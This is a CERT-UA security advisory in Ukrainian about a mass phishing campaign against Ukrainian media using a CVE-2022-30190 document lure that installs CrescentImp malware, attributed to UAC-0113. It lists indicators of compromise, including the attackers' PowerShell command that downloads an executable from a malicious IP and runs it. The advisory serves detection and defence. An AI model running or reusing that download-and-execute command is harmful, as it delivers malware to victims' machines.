Масована кібератака на медійні організації України з використанням шкідливої програми CrescentImp (CERT-UA#4797)

Загальна інформація

Урядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA від учасника інформаційного обміну отримано інформацію щодо масового розсилання електронних листів, зокрема, серед медійних організацій України (радіостанції, газети, новинні агенції та інші) з темою “СПИСОК посилань на інтерактивні карти”. Встановлено більше 500 електронних адрес отримувачів.

У додатку лист містив документ “СПИСОК_посилань_на_інтерактивні_карти.docx”, відкриття якого призведе до завантаження HTML-файлу та виконання JavaScript-коду, що, в свою чергу, забезпечить завантаження та виконання EXE-файлу “2.txt”, що класифіковано як шкідливу програму CrescentImp (дослідження триває).

Зловмисники продовжують використовувати вразливість CVE-2022-30190 та все частіше вдаються до розсилань електронних листів зі скомпрометованих електронних адрес державних органів.

У випадку виявлення ознак компрометації за наданими індикаторами просимо терміново інформувати.

Активність відстежується за ідентифікатором UAC-0113 (з середнім рівнем впевненості асоційовано з групою Sandworm).

Індикатори компрометації

Файли:

    cc27122efef26fa2b4cc5d30845704e7    129073fd0f9234737ff8ca1aadd8cbaef664015d1088d68e8e501fa757c991d0    СПИСОК_посилань_на_інтерактивні_карти.docx
    106d1413f8768be03cb7dc982a1455f9    22d413e4b4fb45f058c312942fb170c2225ab7f30a653d3aeba79c054837b297    update.html
    32ed33d2723251046168fa9ab2016b65    e5f2033a86429f7921449397f3ca06dd92ff14ba35e013fcfdc47d4c4736d046    2.txt (CrescentImp)

Хостові:

  Invoke-WebRequest -Uri hxxp://185[.]80.92.143:8998/2.txt -OutFile C:\Users\Public\chkdsk.exe;Invoke-Expression -Command C:\Users\Public\chkdsk.exe
  C:\Users\Public\chkdsk.exe
  %APPDATA%\chkdsk.exe
  HKCU\Software\Classes\<ZWXpSjTw3bwSniATW8SN>\
  Windows check disk (назва служби)
  999bpJZ1MYwlDF42cztG (м'ютекс; не використовується)

Мережеві:

  hxxp://185[.]80.92.143:8998/update.html
  hxxp://185[.]80.92.143:8998/2.txt
  hxxps://87[.]236.161.43/i
  185[.]80.92.143
  87[.]236.161.43

Графічні зображення